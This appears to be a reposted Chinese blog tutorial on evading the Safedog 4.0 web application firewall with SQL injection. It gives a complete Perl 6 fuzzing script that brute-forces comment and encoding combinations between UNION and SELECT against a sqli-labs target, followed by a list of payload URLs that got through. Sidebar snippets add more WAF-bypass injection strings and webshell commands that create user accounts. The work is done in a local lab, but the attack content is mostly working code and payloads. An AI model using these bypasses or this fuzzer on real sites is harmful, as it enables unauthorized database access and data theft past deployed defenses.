Fuzz安全狗注入绕过

最新推荐文章于 2024-07-03 08:51:45 发布
转载 最新推荐文章于 2024-07-03 08:51:45 发布 · 868 阅读 · 2

本文介绍使用Perl6进行SQL注入攻击,通过模糊测试找出绕过安全狗防护的方法。利用特定字符组合成功绕过安全狗的防御,实现对网站的SQL注入攻击。

 

安全狗版本为: apache 4.0

网站为: php+mysql

系统: win 2003

 

这里只要是fuzz /*!union 跟 select*/ 之间的内容:

1

/*!union<FUZZ_HERE>select*/

 位置很多可以选择。

 

脚本语言你可以用你喜欢的, 我这里用perl6

 

让我们一步步来。

枸造 exp 我用如下代码(代码测试用):

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

#!/bin/env perl6

my @fuzz_sp '/*','*/','/*!','?','*','=','';

my @fuzz_nu = 0..9;

my @fuzz_ch '%0a'..'%0z';

 

my @fuzz_all;

@fuzz_all.append(@fuzz_sp);

@fuzz_all.append(@fuzz_nu);

@fuzz_all.append(@fuzz_ch);

for @fuzz_all -> $exp {

  say $exp;

}

say '-' x 30;

for @fuzz_all -> $a {

  for @fuzz_all -> $b {

    for @fuzz_all -> $c {

      for @fuzz_all -> $d {

        for @fuzz_all -> $e {

          say '/*union'~$a~$b~$c~$d~$e~'select*/';

        }

      }

    }

  }

}

 

 

字符构建你想怎么构造都行, 或者下现成的文件库, 或者看下相应的脚本语言里有没有相应的fuzz模块可以用。

 

perl6中, 写文件没有缓冲区了, 直接用open打开, :a 追加, 用来保存规则用, 测试代码如下:

1

2

3

4

5

6

7

8

9

#!/bin/env perl6

 

my $file '/home/perl/Desktop/test.txt';

my $fp open $file, :a;

my $a = 1;

my $b = 2;

$fp.say($a~$b);

#$fp.flush;

sleep(120);

 

在perl6中, HTTP::UserAgent模块, get的时候, 特殊字符记得要转成uri的编码, 要不get时会报错。 转码用 URI::Encode模块中的 uri_encode方法转换就行。

下面是一小段测试代码:

复制代码

use HTTP::UserAgent;
use URI::Encode;
my $url = 'http://192.168.235.128/sqli-labs-master/Less-1/?id=-1\'';
my $payload = '/*!union/*!/*!select*/1,2,3-- -';
say uri_encode($url~$payload);
#输出输码结果

my $targeturl = uri_encode($url~$payload);

my $ua = HTTP::UserAgent.new;
my $result = $ua.get($targeturl);
say $result.content;
if $result.content ~~ /'Your Login name'/ {
  say 'Bypass!'
}

复制代码

 

测试站用的是 sqllibs。

查找相应的关键字, 如果存在, 就说明bypass了。

 

 

 

 

最终的fuzz版本如下:

复制代码

use HTTP::UserAgent;
use URI::Encode;
my $url = 'http://192.168.235.128/sqli-labs-master/Less-1/?id=-1\'';
#保存数据, 刷新缓冲
my $file = '/home/perl/Desktop/safedog_exp.txt';
my $fp = open $file, :a;


my $ua = HTTP::UserAgent.new;
my @fuzz_sp = '/*','*/','/*!','?','*','=','';
my @fuzz_nu = 0..9;
my @fuzz_ch = '%0a'..'%0z';

my @fuzz_all;
@fuzz_all.append(@fuzz_sp);
@fuzz_all.append(@fuzz_nu);
@fuzz_all.append(@fuzz_ch);

for @fuzz_all -> $a {
  for @fuzz_all -> $b {
    for @fuzz_all -> $c {
      for @fuzz_all -> $d {
        for @fuzz_all -> $e {
          my $exp = '/*!union'~$a~$b~$c~$d~$e~'select*/1,2,3-- -';
          my $targeturl = uri_encode($url~$exp);
          say 'Check url:'~$targeturl;
          #sleep(2);
          my $result = $ua.get($targeturl);
          if $result.content ~~ /'Your Login name'/ {
            say "Bypass!\a\a\a\a\a\a\a ---> "~ $url~$exp;
            $fp.say($url~$exp);
            sleep(5);
          }
        }
      }
    }
  }
}

复制代码

 

 

 

 

 

 

Fuzz到一些规则如下:

复制代码

http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/**//*!/*!select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0b*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0e*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0f*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0g*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0h*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0i*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0j*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0k*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0l*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0m*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0n*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0o*/select*/1,2,3-- -
http://192.168.235.128/sqli-labs-master/Less-1/?id=-1'/*!union/*/*?%0p*/select*/1,2,3-- -

复制代码

 

 

 

注意:

在fuzz时, 你fuzz太快狗默认会禁IP, 或者有时网站mysql数据库会挂掉。

你可以把狗的防CC功能/ IP黑名单关掉。

 

fuzz的最后:

fuzz完之后, 你可以对比一下, 看一下能过的fuzz有没有特点的规律, 总结一下。

对于fuzz位置, 你可以在不同位置测试, 比如:

union<FUZZ_HERE>/*select
<FUZZ_HERE>union<FUZZ_HERE>select
/*!36000uNION<FUZZ_HERE>*/selecT
...
安全狗绕过
jxy158212的博客
02-16 619
对于sql注入漏洞,针对安全狗绕过
waf绕过:网络安全狗绕过
最新发布
m0_71332744的博客
08-07 2014
name='';//使用defun获取assert。
绕过安全狗Getshell
06-12
详细手把手教你如何绕过安全狗Getshell,新手一学就会
绕过安全狗_安全狗Bypass绕过
weixin_39604819的博客
01-11 1862
纸上得来终觉浅,绝知此事要躬行。安全狗的版本是4.0(最新的啦)在实战中会经常遇到waf很困扰,有时候站点有waf连报错都不会回显给你,这就很难受特此做一篇文章总结我学习绕狗的知识总结以安全狗为例,后续会出D盾、守护神等等有时间就做一些总结第一步确认已经打开安全狗,判断是否存在注入点由此可见安全狗对我们的不友好,按照拦截的思路,安全狗是拦截and 1=1一个整体的。如果你输入id?=1 ...
安全狗绕过
alien0011的博客
06-09 3623
安全狗绕过(截至6.8号) 环境: phpstudy2018 安全狗apache版 sqllabs靶场 安全狗绕过思路: 安全狗是基于正则匹配的绕过,所以总是能够绕过其正则匹配实现sql的命令执行,需要对数据库语句灵活掌握。经过对安全狗fuzz,测试其拦截规则,发现其实and、or这样的敏感字符是不会被直接拦截的,但是and加空格就会被拦截,其实绕过的中心可以向如何绕过空格偏移。 为了可以更清晰的认知注入语句是如何在数据库中执行的,我修改了sqli-lab的代...
安全狗mysql_Fuzz绕过安全狗4.0实现SQL注入
weixin_42125192的博客
02-05 382
0×00 前言本文使用了burp的intruder模块进行fuzz,并修改了sqlmap工具的tamper脚本,对安全狗进行绕过。0×01注入绕waf过常用手法使用大小写绕过使用/**/注释符绕过使用大的数据包绕过使用/!**/注释符绕过……0×02本文使用的手法是/**/注释符首先搭建好一个有sql注入的测试平台,在服务器安装安全狗4.0版本中间件和数据库使用的是apache+mysql+php...
安全狗3.5版本SQL注入绕过
恢弘志士的博客
07-19 560
环境搭建: phpstudy+sqli-labs-master 安全狗版本: 出现问题:新版安全狗Apache服务无法启动问题 管理员模式启动cmd,进入phpstudy部署目录phpstudy_pro\Extensions\Apache2.4.39\bin下 执行命令:httpd -k install -n apache2.4 环境搭建完毕,验证安全狗正常拦截开搞开搞!!! 从上面验证看来就是针对union 和select的组合进行拦截 按照B站小迪师傅搞了半天不行,想想应该是.
SQL注入绕过安全狗WAF的高级技巧与防护策略
weixin_43822401的博客
07-03 893
随着攻击者技术的不断进步,WAF和安全防护措施也需要不断更新和强化。通过深入理解SQL注入绕过技术,我们可以更有效地设计防护措施,保护Web应用免受侵害。本文提供的技术信息仅用于教育和学习目的,严禁用于非法或未经授权的网络攻击活动。
堆叠注入,waf绕过 安全狗为主(18)
san3144393495的博客
05-06 557
讲这个例子,堆叠注入他的一个用处,注入的时候需要获取到管理员的账户密码,但密码是加密的,加密经常揭秘不出来,很正常,可以利用这个注入实现堆叠注入,就是插入数据,诸如的时候向管理员这个表里面插入一个数据,成功的给管理员添加一个新用户,之后在用插入的用户名密码去登陆,就不需要考虑密码解不出来。基本上一些常见漏洞都检测,他的检测是插件的那种方法,每次更新也都是更新的插件,他会对还会对工具检测的一些常见的工具,nmap,菜刀,sqlmap,和xxs漏洞检测等基本上的都会检测,默认的检测项目是url。
sql注入绕过安全狗
weixin_48776804的博客
02-15 807
sql注入安全狗
绕过安全狗
weixin_45923850的博客
07-20 1358
1. 判断类型:?id=1正常,?id=1 and 0被拦截,经过变形and和后面值发现这个组合会被拦截,用非常规方式绕过,例?id=1 and -1=-2和?id=1 and -1=-1,虽然绕过了,但是页面没变化,所以可能是字符型,加单引号就正常,?id=1' and -1=-1 --+ 2. 判断列数:输入?id=1' order by 3 --+被拦截,用注释,?id=1' /*!23144 order==*/ /*!32443 by*/ 3 --+页面正常,绕狗成功 3.
一次安全狗绕过
weixin_45490166的博客
07-15 382
http://115.159.97.35/sqli-labs-master/Less-1/?id=1 安全狗绕过 参考 https://www.cnblogs.com/Yang34/p/12055052.html ?id=1' order/*!99999asd*/by 3 --+ ?id=-1'union/*!99999test*/select 1,2,/*!99999test*/group_concat(schema_name) from information_schema.schemata--+
Safedog 4.0 bypass绕过
Keepb1ue的博客
02-28 4756
Safedog 4.0 bypass绕过
安全狗文件绕过
weixin_30241919的博客
08-24 538
上传绕过WAF的一些常用方法 0X01姿势总结 (1)fuzz文件名后缀方法用burpsuite进行模糊测试,寻找黑名单之外的文件(2)windows系统可以进行后缀修改如:webshell.php……………..(3)路径绕过:有些WAF只会监视某个目录是否被上传webshell(4)大小写组合如:PhP,pHp(5)filename换行(6)多个filename(7)引号绕过如:双...
web攻防漏洞之Bypass安全狗绕过
s11show_163的博客
02-28 1295
目的:攻击者在被害者网站上挂载一个自己的木马文件1.php,然后通过在攻击者电脑上访问该挂载文件来实现对被害者网站或者被害者电脑进行侵害。 攻击者希望执行: 创建服务器用户: key=echo('<pre>');system('net user a a /add'); 删除服务器用户: key=echo('<pre>');system('net user a /del')...
安全狗- bypass技巧
qq_45951598的博客
05-07 299
sql注入bypass 判断是否存在注入 payload ?id=2' and -ascii('a')=-abs('-97') --+ hhp参数污染 payload ?id=1' /*&id=1' order by 99 --+ */ 报错注入payload ?id=1' /*&id=-1'and(select extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.table
绕过安全狗优化
m0_62207482的博客
02-06 1256
8.2节中,我们已经完成模糊测试绕过安全狗脚本,其中仅仅对数字进行了模 糊处理,如此已经能够产生许多绕过安全狗的方法,如果需要更多的绕过安全狗 方法,可在此脚本的基础上进行修改,完善此脚本。在WAF应用程序进行防护的时候,一部分防护厂商会对某些user-agent进行特 殊放行,例如百度爬虫的user-agent。常见的绕过安全狗的方式有4种:利用string绕过、利用user-agent绕过、利用 MySQL语法和html的特殊性绕过、利用畸形数据包绕过。3.利用MySQL语法和HTML的特殊性绕过
Oracle注入技巧:绕过安全狗实践
本文主要探讨的是针对Oracle数据库的注入技巧,特别是如何绕过安全防护措施(通常被称为“狗”或WAF)进行有效测试和防御。 0x00 前言 Oracle数据库与MySQL在SQL语法上存在差异,因此在进行Oracle注入时需要了解其...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值